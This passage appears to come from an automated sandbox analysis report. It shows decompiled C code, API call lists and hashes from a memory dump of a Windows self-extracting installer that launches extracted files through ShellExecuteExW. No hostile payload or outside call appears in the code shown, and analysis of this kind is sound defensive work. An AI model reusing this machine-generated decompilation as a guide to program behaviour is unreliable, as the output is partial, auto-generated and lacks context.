                												goto L48;
                											}
                											_t357 = _t390[0x18] + _t383;
                											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
                											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
                												goto L47;
                											}
                											_t273 = _t316;
                											_t383 = _t357 + 1;
                											_t390[0x16] = _t273;
                											L48:
                											_t316 = _t316 + 1;
                											__eflags = _t316 - 4;
                										} while (_t316 < 4);
                										_t387 = _t390[0x12];
                										_t316 = 0;
                										__eflags = _t273;
                										if(__eflags != 0) {
                											_t228 = _t390[0x1a];
                											if(__eflags <= 0) {
                												goto L71;
                											} else {
                												goto L59;
                											}
                											while(1) {
                												L59:
                												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
                												__eflags = _t351 - _t375;
                												if(_t351 == _t375) {
                													goto L61;
                												}
                												L60:
                												_t132 =  &(_t390[0x15]); // 0x9
                												__eflags = _t351 -  *_t132;
                												if(_t351 !=  *_t132) {
                													_t376 = _t228 + _t383 * 2;
                													_t390[0x18] = _t316;
                													_t274 = 0x20;
                													_t352 = _t316;
                													__eflags =  *_t376 - _t274;
                													if( *_t376 <= _t274) {
                														L66:
                														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
                														E00CB11FA(_t390 - 0x19c, _t390 - 0x70, 0x64);
                														_t383 = _t383 + _t390[0x18];
                														_t279 = _t390[0x16];
                														__eflags = _t279 - 3;
                														if(_t279 != 3) {
                															__eflags = _t279 - 1;
                															_t280 = "$%s:";
                															if(_t279 != 1) {
                																_t280 = "@%s:";
                															}
                															E00CAD9DC(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
                															_t394 = _t394 + 0x10;
                														} else {
                															_t284 = E00CC2B69(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
                															asm("sbb al, al");
                															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
                														}
                														goto L51;
                													} else {
                														goto L63;
                													}
                													while(1) {
                														L63:
                														__eflags = _t352 - 0x63;
                														if(_t352 >= 0x63) {
                															break;
                														}
                														_t287 =  *_t376;
                														_t376 = _t376 + 2;
                														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
                														_t352 = _t352 + 1;
                														_t288 = 0x20;
                														__eflags =  *_t376 - _t288;
                														if( *_t376 > _t288) {
                															continue;
                														}
                														break;
                													}
                													_t390[0x18] = _t352;
                													goto L66;
                												}
                												L61:
                												_t383 = _t383 + 1;
                												L59:
                												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
                												__eflags = _t351 - _t375;
                												if(_t351 == _t375) {
                													goto L61;
                												}
                												goto L60;
                											}
                										}
                										E00CAFA56(_t390 - 0xd4, 0xcd2624, 0x64);
                										goto L51;
                									}
                									__eflags = _t373 - _t390[0x13];
                									if(_t373 != _t390[0x13]) {
                										goto L80;
                									}
                									goto L42;
                									L52:
                									__eflags = _t383 - _t390[0x19];
                								} while (_t383 < _t390[0x19]);
                								_t218 = _t390[0x1b];
                								_t371 = _t390[0x17];
                								goto L54;
                							} else {
                								L00CC2B4E(_t382);
                								goto L57;
                							}
                						}
                						_t333 = _t328 >> 1;
                						_t390[0x19] = _t333;
                						goto L33;
                					} else {
                						goto L5;
                					}
                					do {
                						L5:
                						E00CB3393(_t387, _t370, _t380);
                						E00CB3393(_t387 + 0x14, _t370, _t380);
                						_t380 = _t380 + 1;
                						_t399 = _t380 -  *0xcdd5f4; // 0x63
                					} while (_t399 < 0);
                					_t316 = 0;
                					goto L7;
                				}
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 00CACFD9
                • _wcschr.LIBVCRUNTIME ref: 00CACFFA
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CAD015
                • __fprintf_l.LIBCMT ref: 00CAD4FB
                  • Part of subcall function 00CB0FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CAB312,00000000,?,?,?,000202DA), ref: 00CB0FFA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-4124877899
                • Opcode ID: 16810ecb05289505c728c1bebaeb45eb1f982d10aa938c463203d47ddb5902ae
                • Instruction ID: 3ab41b9c5cc05ec0ac21b35c070730945183ed56c8050e8af8b7de682064a9f6
                • Opcode Fuzzy Hash: 16810ecb05289505c728c1bebaeb45eb1f982d10aa938c463203d47ddb5902ae
                • Instruction Fuzzy Hash: BD12B0B160030A9BDF24EFA4DC45BED37A9EF06718F10012AF91B97691EB71DA81DB50
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CBC190(intOrPtr _a4, long _a8) {
                				char _v67;
                				intOrPtr _v72;
                				signed int _v84;
                				int _v88;
                				void* _v92;
                				intOrPtr _t40;
                				intOrPtr _t43;
                				struct HWND__* _t45;
                				char _t48;
                
                				E00CBA388(); // executed
                				_t45 = GetDlgItem( *0xce75c8, 0x68);
                				_t48 =  *0xce75d6; // 0x1
                				if(_t48 == 0) {
                					_t43 =  *0xce75e8; // 0x0
                					E00CB8569(_t43);
                					ShowWindow(_t45, 5); // executed
                					SendMessageW(_t45, 0xb1, 0, 0xffffffff);
                					SendMessageW(_t45, 0xc2, 0, 0xcd22e4);
                					 *0xce75d6 = 1;
                				}
                				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
                				_v92 = 0x5c;
                				SendMessageW(_t45, 0x43a, 0,  &_v92);
                				_v67 = 0;
                				_t40 = _a4;
                				_v88 = 1;
                				if(_t40 != 0) {
                					_v72 = 0xa0;
                					_v88 = 0x40000001;
                					_v84 = _v84 & 0xbfffffff | 1;
                				}
                				SendMessageW(_t45, 0x444, 1,  &_v92);
                				SendMessageW(_t45, 0xc2, 0, _a8);
                				SendMessageW(_t45, 0xb1, 0x5f5e100, 0x5f5e100);
                				if(_t40 != 0) {
                					_v84 = _v84 & 0xfffffffe | 0x40000000;
                					SendMessageW(_t45, 0x444, 1,  &_v92);
                				}
                				return SendMessageW(_t45, 0xc2, 0, L"\r\n");
                			}

                APIs
                  • Part of subcall function 00CBA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBA399
                  • Part of subcall function 00CBA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBA3AA
                  • Part of subcall function 00CBA388: IsDialogMessageW.USER32(000202DA,?), ref: 00CBA3BE
                  • Part of subcall function 00CBA388: TranslateMessage.USER32(?), ref: 00CBA3CC
                  • Part of subcall function 00CBA388: DispatchMessageW.USER32(?), ref: 00CBA3D6
                • GetDlgItem.USER32(00000068,00CFDE38), ref: 00CBC1A4
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB9D8F), ref: 00CBC1CF
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBC1DE
                • SendMessageW.USER32(00000000,000000C2,00000000,00CD22E4), ref: 00CBC1E8
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBC1FE
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBC214
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBC254
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBC25E
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBC26D
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBC290
                • SendMessageW.USER32(00000000,000000C2,00000000,00CD304C), ref: 00CBC29B
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: 23bbcbb52bdadc3771131f3e23eccbfbcf89a3c6e434caf9f27b990ec00a1e68
                • Instruction ID: bda5eff7244c5138305872a7e9464634073897b4281307418555286d53162f5e
                • Opcode Fuzzy Hash: 23bbcbb52bdadc3771131f3e23eccbfbcf89a3c6e434caf9f27b990ec00a1e68
                • Instruction Fuzzy Hash: 7221F67124A7447BE311FB249C81FAF7B9CEF82754F000619F690AA1D1C7A59A098AB7
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 48%
                			E00CBC431(struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
                				signed short _v0;
                				long _v12;
                				void* __edi;
                				int _t54;
                				signed int _t57;
                				signed short* _t58;
                				long _t68;
                				int _t77;
                				signed int _t80;
                				signed short* _t81;
                				signed short _t82;
                				intOrPtr _t84;
                				long _t86;
                				signed short* _t87;
                				struct HWND__* _t89;
                				signed short* _t91;
                				void* _t93;
                				void* _t95;
                				void* _t99;
                
                				_t54 = 0x1040;
                				E00CBD940();
                				_t91 = _a4168;
                				_t77 = 0;
                				if( *_t91 == 0) {
                					L55:
                					return _t54;
                				}
                				_t54 = E00CC2B33(_t91);
                				if(0x1040 >= 0x7f6) {
                					goto L55;
                				} else {
                					_t86 = 0x3c;
                					E00CBE920(_t86,  &_a4, 0, _t86);
                					_t84 = _a4172;
                					_t99 = _t99 + 0xc;
                					_a4.cbSize = _t86;
                					_a8 = 0x1c0;
                					if(_t84 != 0) {
                						_a8 = 0x5c0;
                					}
                					_t80 =  *_t91 & 0x0000ffff;
                					_t87 =  &(_t91[1]);
                					_t95 = 0x22;
                					if(_t80 != _t95) {
                						_t87 = _t91;
                					}
                					_a20 = _t87;
                					_t57 = _t77;
                					if(_t80 == 0) {
                						L13:
                						_t58 = _a24;
                						L14:
                						if(_t58 == 0 ||  *_t58 == _t77) {
                							if(_t84 == 0 &&  *0xcea602 != _t77) {
                								_a24 = 0xcea602;
                							}
                						}
                						_a32 = 1;
                						_t93 = E00CAB153(_t87);
                						if(_t93 != 0 && E00CB1410(_t93, L".inf") == 0) {
                							_a16 = L"Install";
                						}
                						if(E00CA9E6B(_a20) != 0) {
                							_push(0x800);
                							_push( &_a64);
                							_push(_a20);
                							E00CAAED7();
                							_a8 =  &_a52;
                						}
                						_t54 = ShellExecuteExW( &_a4); // executed
                						if(_t54 != 0) {
                							_t89 = _a4160;
                							if( *0xce85f8 != _t77 || _a4168 != _t77 ||  *0xcfde21 != _t77) {
                								if(_t89 != 0) {
                									_push(_t89);
                									if( *0xcddf24() != 0) {
                										ShowWindow(_t89, _t77);
                										_t77 = 1;
                									}
                								}
                								 *0xcddf20(_a56, 0x7d0);
                								E00CBC8F0(_a48);
                								if( *0xcfde21 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
                									_t68 = _v12;
                									if(_t68 >  *0xcfde24) {
                										 *0xcfde24 = _t68;
                									}
                									 *0xcfde22 = 1;
                								}
                							}
                							CloseHandle(_a48);
                							if(_t93 == 0 || E00CB1410(_t93, L".exe") != 0) {
                								_t54 = _a4160;
                								if( *0xce85f8 != 0 && _t54 == 0 &&  *0xcfde21 == _t54) {
                									 *0xcfde28 = 0x1b58;
                								}
                							} else {
                								_t54 = _a4160;
                							}
                							if(_t77 != 0 && _t54 != 0) {
                								_t54 = ShowWindow(_t89, 1);
                							}
                						}
                						goto L55;
                					}
                					_t81 = _t91;
                					_v0 = 0x20;
                					do {
                						if( *_t81 == _t95) {
                							while(1) {
                								_t57 = _t57 + 1;
                								if(_t91[_t57] == _t77) {
                									break;
                								}
                								if(_t91[_t57] == _t95) {
                									_t82 = _v0;
                									_t91[_t57] = _t82;
                									L10:
                									if(_t91[_t57] == _t82 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
                										if(_t91[_t57] == _v0) {
                											_t91[_t57] = 0;
                										}
                										_t58 =  &(_t91[_t57 + 1]);
                										_a24 = _t58;
                										goto L14;
                									} else {
                										goto L12;
                									}
                								}
                							}
                						}
                						_t82 = _v0;
                						goto L10;
                						L12:
                						_t57 = _t57 + 1;
                						_t81 =  &(_t91[_t57]);
                					} while ( *_t81 != _t77);
                					goto L13;
                				}
                			}

                APIs
                • ShellExecuteExW.SHELL32(000001C0), ref: 00CBC55F
                • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 00CBC5A4
                • GetExitCodeProcess.KERNEL32 ref: 00CBC5DC
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBC602
                • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 00CBC691
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: 6dfd24f348d787dd6cbfcbce2f5d4375725c6048b18659dcbde0472c1437559d
                • Instruction ID: 49d2fc7e4e0ff40c408d03d07f0110c947c506220412ff6f61b9140de7b3b287
                • Opcode Fuzzy Hash: 6dfd24f348d787dd6cbfcbce2f5d4375725c6048b18659dcbde0472c1437559d
                • Instruction Fuzzy Hash: 6F51BE718053809BDB319F60D990BFFB7E9AF95304F08081EF5E297151D7B19A88EB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00CC95A5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				signed int _t49;
                				signed int _t54;
                				int _t57;
                				signed int _t59;
                				short* _t61;
                				signed int _t65;
                				short* _t69;
                				int _t77;
                				short* _t80;
                				signed int _t86;
                				signed int _t89;
                				void* _t94;
                				void* _t95;
                				int _t97;
                				short* _t100;
                				int _t102;
                				int _t104;
                				signed int _t105;
                				short* _t106;
                				void* _t109;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t49 =  *0xcdd668; // 0x814d2927
                				_v8 = _t49 ^ _t105;
                				_push(__esi);
                				_t102 = _a20;
                				if(_t102 > 0) {
                					_t77 = E00CCDBBC(_a16, _t102);
                					_t109 = _t77 - _t102;
                					_t4 = _t77 + 1; // 0x1
                					_t102 = _t4;
                					if(_t109 >= 0) {
                						_t102 = _t77;
                					}
                				}
                				_t97 = _a32;
                				if(_t97 == 0) {
                					_t97 =  *( *_a4 + 8);
                					_a32 = _t97;
                				}
                				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					return E00CBE203(_t54, _v8 ^ _t105);
                				} else {
                					_t94 = _t54 + _t54;
                					_t84 = _t94 + 8;
                					asm("sbb eax, eax");
                					if((_t94 + 0x00000008 & _t54) == 0) {
                						_t80 = 0;
                						__eflags = 0;
                						L14:
                						if(_t80 == 0) {
                							L36:
                							_t104 = 0;
                							L37:
                							E00CC980D(_t80);
                							_t54 = _t104;
                							goto L38;
                						}
                						_t57 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t80, _v12);
                						_t120 = _t57;
                						if(_t57 == 0) {
                							goto L36;
                						}
                						_t99 = _v12;
                						_t59 = E00CC9C64(_t84, _t102, _t120, _a8, _a12, _t80, _v12, 0, 0, 0, 0, 0); // executed
                						_t104 = _t59;
                						if(_t104 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t95 = _t104 + _t104;
                							_t86 = _t95 + 8;
                							__eflags = _t95 - _t86;
                							asm("sbb eax, eax");
                							__eflags = _t86 & _t59;
                							if((_t86 & _t59) == 0) {
                								_t100 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t100;
                								if(__eflags == 0) {
                									L35:
                									E00CC980D(_t100);
                									goto L36;
                								}
                								_t61 = E00CC9C64(_t86, _t104, __eflags, _a8, _a12, _t80, _v12, _t100, _t104, 0, 0, 0);
                								__eflags = _t61;
                								if(_t61 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
                								__eflags = _t104;
                								if(_t104 != 0) {
                									E00CC980D(_t100);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t89 = _t95 + 8;
                							__eflags = _t95 - _t89;
                							asm("sbb eax, eax");
                							_t65 = _t59 & _t89;
                							_t86 = _t95 + 8;
                							__eflags = _t65 - 0x400;
                							if(_t65 > 0x400) {
                								__eflags = _t95 - _t86;
                								asm("sbb eax, eax");
                								_t100 = E00CC7A8A(_t86, _t65 & _t86);
                								_pop(_t86);
                								__eflags = _t100;
                								if(_t100 == 0) {
                									goto L35;
                								}
                								 *_t100 = 0xdddd;
                								L28:
                								_t100 =  &(_t100[4]);
                								goto L30;
                							}
                							__eflags = _t95 - _t86;
                							asm("sbb eax, eax");
                							E00CD0EE0();
                							_t100 = _t106;
                							__eflags = _t100;
                							if(_t100 == 0) {
                								goto L35;
                							}
                							 *_t100 = 0xcccc;
                							goto L28;
                						}
                						_t69 = _a28;
                						if(_t69 == 0) {
                							goto L37;
                						}
                						_t124 = _t104 - _t69;
                						if(_t104 > _t69) {
                							goto L36;
                						}
                						_t104 = E00CC9C64(0, _t104, _t124, _a8, _a12, _t80, _t99, _a24, _t69, 0, 0, 0);
                						if(_t104 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t71 = _t54 & _t94 + 0x00000008;
                					_t84 = _t94 + 8;
                					if((_t54 & _t94 + 0x00000008) > 0x400) {
                						__eflags = _t94 - _t84;
                						asm("sbb eax, eax");
                						_t80 = E00CC7A8A(_t84, _t71 & _t84);
                						_pop(_t84);
                						__eflags = _t80;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t80 = 0xdddd;
                						L12:
                						_t80 =  &(_t80[4]);
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E00CD0EE0();
                					_t80 = _t106;
                					if(_t80 == 0) {
                						goto L36;
                					}
                					 *_t80 = 0xcccc;
                					goto L12;
                				}
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC451B,00CC451B,?,?,?,00CC97F6,00000001,00000001,31E85006), ref: 00CC95FF
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CC97F6,00000001,00000001,31E85006,?,?,?), ref: 00CC9685
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,31E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CC977F
                • __freea.LIBCMT ref: 00CC978C
                  • Part of subcall function 00CC7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC2FA6,?,0000015D,?,?,?,?,00CC4482,000000FF,00000000,?,?), ref: 00CC7ABC
                • __freea.LIBCMT ref: 00CC9795
                • __freea.LIBCMT ref: 00CC97BA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 50fb995f4e4dff14611e8b6a814ed06e46805c3d89b6932b6a0bbb0ef737b6ba
                • Instruction ID: b9d3edee72d1eec7433e10def6538dbab95811310d4abcac6e44d9a86e52ae28
                • Opcode Fuzzy Hash: 50fb995f4e4dff14611e8b6a814ed06e46805c3d89b6932b6a0bbb0ef737b6ba
                • Instruction Fuzzy Hash: 6E510E72621216ABEB258F64CC89FAF77A9EB40760F25462DFC14D6180EB34DD40DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CB9A32(long _a4) {
                				short _v164;
                				long _t5;
                				long _t6;
                				WCHAR* _t9;
                				long _t11;
                
                				_t11 = _a4;
                				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
                				if(_t5 != 0) {
                					_t9 = L"EDIT";
                					_t5 = E00CB1410( &_v164, _t9);
                					if(_t5 != 0) {
                						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
                						_t11 = _t5;
                					}
                				}
                				if(_t11 != 0) {
                					_t6 = SHAutoComplete(_t11, 0x10); // executed
                					return _t6;
                				}
                				return _t5;
                			}

                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 00CB9A49
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CB9A80
                  • Part of subcall function 00CB1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00CAACFE,?,?,?,00CAACAD,?,-00000002,?,00000000,?), ref: 00CB1426
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CB9A70
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT$pltv
                • API String ID: 4243998846-1976670045
                • Opcode ID: a325766594948c9668202941b4e5e465f20bf0b67d61f7667983bbaaee502d8b
                • Instruction ID: ad388060ab115a65c69e97f7344861fffcb1d71dfe3c1d6211301dc23c9a1ade
                • Opcode Fuzzy Hash: a325766594948c9668202941b4e5e465f20bf0b67d61f7667983bbaaee502d8b
                • Instruction Fuzzy Hash: 79F08232A4122877D73097A59C46FEF776CDB86B51F440167BE02A31C0D7749A0296F6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 94%
                			E00CA9768(void* __ecx, void* __esi, struct _FILETIME _a4, signed int _a8, short _a12, WCHAR* _a4184, unsigned int _a4188) {
                				long _v0;
                				void* _t48;
                				long _t59;
                				unsigned int _t61;
                				long _t64;
                				signed int _t65;
                				char _t68;
                				void* _t72;
                				void* _t74;
                				long _t78;
                				void* _t81;
                
                				_t74 = __esi;
                				E00CBD940();
                				_t61 = _a4188;
                				_t72 = __ecx;
                				 *(__ecx + 0x1020) =  *(__ecx + 0x1020) & 0x00000000;
                				if( *((char*)(__ecx + 0x1d)) != 0 || (_t61 & 0x00000004) != 0) {
                					_t68 = 1;
                				} else {
                					_t68 = 0;
                				}
                				_push(_t74);
                				asm("sbb esi, esi");
                				_t78 = ( ~(_t61 >> 0x00000001 & 1) & 0xc0000000) + 0x80000000;
                				if((_t61 & 0x00000001) != 0) {
                					_t78 = _t78 | 0x40000000;
                				}
                				_t64 =  !(_t61 >> 3) & 0x00000001;
                				if(_t68 != 0) {
                					_t64 = _t64 | 0x00000002;
                				}
                				_v0 = (0 |  *((intOrPtr*)(_t72 + 0x15)) != 0x00000000) - 0x00000001 & 0x08000000;
                				E00CA6EF9( &_a12);
                				if( *((char*)(_t72 + 0x1c)) != 0) {
                					_t78 = _t78 | 0x00000100;
                				}
                				_t48 = CreateFileW(_a4184, _t78, _t64, 0, 3, _v0, 0); // executed
                				_t81 = _t48;
                				if(_t81 != 0xffffffff) {
                					L17:
                					if( *((char*)(_t72 + 0x1c)) != 0 && _t81 != 0xffffffff) {
                						_a4.dwLowDateTime = _a4.dwLowDateTime | 0xffffffff;
                						_a8 = _a8 | 0xffffffff;
                						SetFileTime(_t81, 0,  &_a4, 0);
                					}
                					 *((char*)(_t72 + 0x12)) = 0;
                					_t65 = _t64 & 0xffffff00 | _t81 != 0xffffffff;
                					 *((intOrPtr*)(_t72 + 0xc)) = 0;
                					 *((char*)(_t72 + 0x10)) = 0;
                					if(_t81 != 0xffffffff) {
                						 *(_t72 + 4) = _t81;
                						E00CAFAB1(_t72 + 0x1e, _a4184, 0x800);
                					}
                					return _t65;
                				} else {
                					_a4.dwLowDateTime = GetLastError();
                					if(E00CAB32C(_a4184,  &_a12, 0x800) == 0) {
                						L15:
                						if(_a4.dwLowDateTime == 2) {
                							 *((intOrPtr*)(_t72 + 0x1020)) = 1;
                						}
                						goto L17;
                					}
                					_t81 = CreateFileW( &_a12, _t78, _t64, 0, 3, _v0, 0);
                					_t59 = GetLastError();
                					if(_t59 == 2) {
                						_a4.dwLowDateTime = _t59;
                					}
                					if(_t81 != 0xffffffff) {
                						goto L17;
                					} else {
                						goto L15;
                					}
                				}
                			}

                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,00CA76F2,?,00000005,?,00000011), ref: 00CA9804
                • GetLastError.KERNEL32(?,?,00CA76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA9811
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,00000000,00000800,?,?,00CA76F2,?,00000005,?), ref: 00CA9846
                • GetLastError.KERNEL32(?,?,00CA76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA984E
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CA76F2,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA9893
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 207602e87edb90cefc3e20e6829330244e42ecccb501fb72514cf52506e7630f
                • Instruction ID: edd3eba4f89e6c0cfec8119706d1de4f300b6e70e804856c268e6f49b6686f5a
                • Opcode Fuzzy Hash: 207602e87edb90cefc3e20e6829330244e42ecccb501fb72514cf52506e7630f
                • Instruction Fuzzy Hash: FA4128314447476BE3209F648C06BDABBE4EB03328F10071AF9B1961D0D779A989CB91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CBA388() {
                				struct tagMSG _v32;
                				int _t7;
                				struct HWND__* _t10;
                				long _t14;
                
                				_t7 = PeekMessageW( &_v32, 0, 0, 0, 0); // executed
                				if(_t7 != 0) {
                					GetMessageW( &_v32, 0, 0, 0);
                					_t10 =  *0xce75c8; // 0x202da
                					if(_t10 == 0) {
                						L3:
